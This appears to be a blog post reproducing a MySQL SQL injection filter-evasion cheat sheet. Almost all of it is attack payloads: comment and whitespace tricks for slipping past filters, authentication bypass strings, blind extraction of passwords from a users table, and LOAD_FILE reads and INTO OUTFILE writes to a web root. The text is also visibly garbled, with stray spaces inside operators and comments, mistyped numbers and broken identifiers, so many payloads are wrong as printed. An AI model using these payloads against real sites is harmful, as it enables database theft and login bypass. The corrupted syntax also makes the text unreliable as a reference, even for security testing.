SQLi filter evasion cheat sheet (MySQL)
Basic filter
Comments
'Or 1 = 1 #
'Or 1 = 1 -
'Or 1 = 1 / * (MySQL <5.1)
'Or 1 = 1;
'Or 1 = 1 union select 1.2 as `
'Or # newline
1 = '1
'Or--newline
1 = '1
'/ *! 50000or * / 1 = '1
'/ *! Hay * / 1 = '1
Prefixes
+ - ~!
'Or - +2 = -!!! '2
Operators
^, =,! =,%, /, *, &, &&, | |, | |,, >>, <=, <=,,, XOR, DIV, LIKE, SOUNDS LIKE, RLIKE, REGEXP, Least, Greatest , CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY, BETWEEN, ISNULL
Whitespaces
% 20% 09% 0a% 0B% 0c% 0d% a0 / ** /
'Or + (1) sounds / ** / like "1" -% a0-
'Union (select (1), tabe_name, (3) from `information_s Chema`. `Tables`) #
Strings with quotes
SELECT 'a'
SELECT "a"
SELECT n'a '
SELECT b'1100001 '
SELECT _binary'1100001 '
SELECT x'61 '
Strings without quotes
'Abc' = 0 × 616263
Aliases
select pass as alias from users
select pass aliasalias from users
select pass `alias alias` from users
Typecasting
'Or true = '1 # or 1 = 1
'Or round (pi (), 1) + true + true = version () # or 3.1 +1 +1 = 5.1
'Or '1 # or true
Compare operator typecasting
select * from users where 'a' = 'b' = 'c'
select * from users where ('a' = 'b') = 'c'
select * from users where (false) = 'c'
select * from users where (0) = 'c'
select * from users where (0) = 0
select * from users where true
select * from users
Authentication bypass '='
select * from users where name = "="
select * from users where false = "
select * from users where 0 = 0
select * from users where true
select * from users
Authentication bypass '-'
select * from users where name = "-"
select * from users where name = 0-0
select * from users where 0 = 0
select * from users where true
select * from users
Function filter
General function filtering
ascii (97)
LOAD_FILE / * foo * / (0 × 616 263)
Strings with functions
'Abc' = unhex (616 263)
'Abc' = char (97,98,99)
hex ('a') = 61
ascii ('a') = 97
ord ('a') = 97
'ABC' = concat (conv (10,10,36), conv (11,10,36), conv (12,10,36))
Strings Extracted from gadgets
collation (\ N) / / binary
collation (user ()) / / utf8_general_ci
@ @ Time_format / /% H:% i:% s
@ @ Binlog_format / / MIXED
@ @ Version_comment / / MySQL Community Server (GPL)
dayname (from_days (401)) / / Monday
dayname (from_days (403)) / / Wednesday
monthname (from_days (690)) / / November
monthname (from_unixtime (1)) / / January
collation (convert ((1) using / ** / koi8r)) / / koi8r_general_ci
(Select (collation_name) from (information_schema.col lations) where (id) = 2) / / latin2_czech_cs
Special characters Extracted from gadgets
AES_ENCRYPT (1.12) / / 4CH ± {? "^ c × HeEEa
DES_ENCRYPT (1,2) / /, / iOk
@ @ Ft_boolean_syntax / / + -> <() ~ *: "" & |
@ @ DATE_FORMAT / /% Y-% m-% d
@ @ Innodb_log_group_home_dir / /. \
Integer representations
false: 0
true: 1
true + true: 2
floor (pi ()): 3
ceil (pi ()): 4
floor (version ()): 5
ceil (version ()): 6
ceil (pi () + pi ()): 7
floor (version () + pi ()): 8
floor (pi () * pi ()): 9
ceil (pi () * pi ()): 10
concat (true, true): 11
ceil (pi () * pi ()) + true: 11
ceil (pi () pi () + version ()): 12
floor (pi () * pi () + pi ()): 13
ceil (pi () * pi () + pi ()): 14
ceil (pi () * pi () + version ()): 15
floor (pi () * version ()): 16
ceil (pi () * version ()): 17
ceil (pi () * version ()) + true: 18
floor ((pi () + pi ()) * pi ()): 19
ceil ((pi () + pi ()) * pi ()): 20
ceil (ceil (pi ()) * version ()): 21
concat (true + true, true): 21
ceil (pi () * ceil (pi () + pi ())): 22
ceil ((pi () + ceil (pi ())) * pi ()): 23
ceil (pi ()) * ceil (version ()): 24
floor (pi () * (version () + pi ())): 25
floor (version () * version ()): 26
ceil (version () * version ()): 27
ceil (pi () * pi () * pi () pi ()): 28
floor (pi () * pi () * floor (pi ())): 29
ceil (pi () * pi () * floor (pi ())): 30
concat (floor (pi ()), false): 30
floor (pi () * pi () * pi ()): 31
ceil (pi () * pi () * pi ()): 32
ceil (pi () * pi () * pi ()) + true: 33
ceil (pow (pi () pi ())-pi ()): 34
ceil (pi () * pi () * pi () + pi ()): 35
floor (pow (pi () pi ())): 36
@ @ New: 0
@ @ Log_bin: 1
! Pi (): 0
!! Pi (): 1
true-~ true: 3
log (-cos (pi ())): 0
-Cos (pi ()): 1
coercibility (user ()): 3
coercibility (now ()): 4
minute (now ())
hour (now ())
(NOW ())
week (now ())
month (now ())
year (now ())
quarter (now ())
year (@ @ timestamp)
CRC32 (true)
Extract substrings
substr ('abc', 1,1) = 'a'
substr ('abc' from 1 for 1) = 'a'
substring ('abc', 1,1) = 'a'
substring ('abc' from 1 for 1) = 'a'
mid ('abc', 1,1) = 'a'
mid ('abc' from 1 for 1) = 'a'
lpad ('abc', 1, space (1)) = 'a'
RPAD ('abc', 1, space (1)) = 'a'
left ('abc', 1) = 'a'
reverse (right (reverse ('abc'), 1)) = 'a'
insert (insert ('abc', 1,0, space (0)), 2,222, space (0)) = 'a'
space (0) = trim (version () from (version ()))
Search substrings
locate ('a', 'abc')
position ('a', 'abc')
position ('a' IN 'abc')
INSTR ('abc', 'a')
SUBSTRING_INDEX ('ab', 'b', 1)
Cut substrings
length (trim (leading 'a' FROM 'abc'))
length (replace ('abc', 'a', "))
Compare strings
strcmp ('a', 'a')
mod ('a', 'a')
find_in_set ('a', 'a')
field ('a', 'a')
count (concat ('a', 'a'))
String length
length ()
bit_length ()
char_length ()
octet_length ()
bit_count ()
String case
ucase
LCase
lower
upper
password ('a')! = password ('A')
OLD_PASSWORD ('a')! = OLD_PASSWORD ('A')
md5 ('a')! = md5 ('A')
sha ('a')! = sha ('A')
AES_ENCRYPT ('a')! = AES_ENCRYPT ('A')
DES_ENCRYPT ('a')! = DES_ENCRYPT ('A')
Keyword filter
Connected keyword filtering
(0) union (select (table_name), column_name, ...
0 / ** / union / *! 50000select * / table_name `foo` / ** / ...
0% a0union% a0select% 09group_concat (table_name) ....
0'union all select all `table_name` foo from `information_schema`. `Tables`
OR, AND
'| | 1 = '1
'&& 1 = '1
'='
'-'
OR, AND, UNION
'And (select pass from users limit 1) =' secret
OR, AND, UNION, LIMIT
'And (select pass from users where id = 1) =' a
OR, AND, UNION, LIMIT, WHERE
'And (select pass from users group by id having id = 1) =' a
OR, AND, UNION, LIMIT, WHERE, GROUP
'And length ((select pass from users having substr (pass, 1,1) =' a '))
OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING
'And (select substr (group_concat (pass), 1,1) from users) =' a
'And substr ((select max (pass) from users), 1,1) =' a
'And substr ((select max (replace (pass,' lastpw ', ")) from users), 1,1) =' a
OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT
'And substr (LOAD_FILE (' file '), locate (' DocumentRoo t ', (LOAD_FILE (' file '))) + length (the' ot DocumentRo '), 10) =' a
'= "Into outfile' / var / www / dump.txt
OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT, FILE
'Procedure Analyse () #
'-If (name =' Admin ', 1,0) #
'-If (if (name =' Admin ', 1,0), if (substr (pass, 1,1) = a', 1,0), 0) #
Control flow
case 'a' when 'a' then 1 [else 0] end
case when 'a' = 'a' then 1 [else 0] end
if ('a' = 'a', 1.0)
IFNULL (NULLIF ('a', 'a'), 1)
Enjoy..
PROTOTYPE...
0 comments:
Post a Comment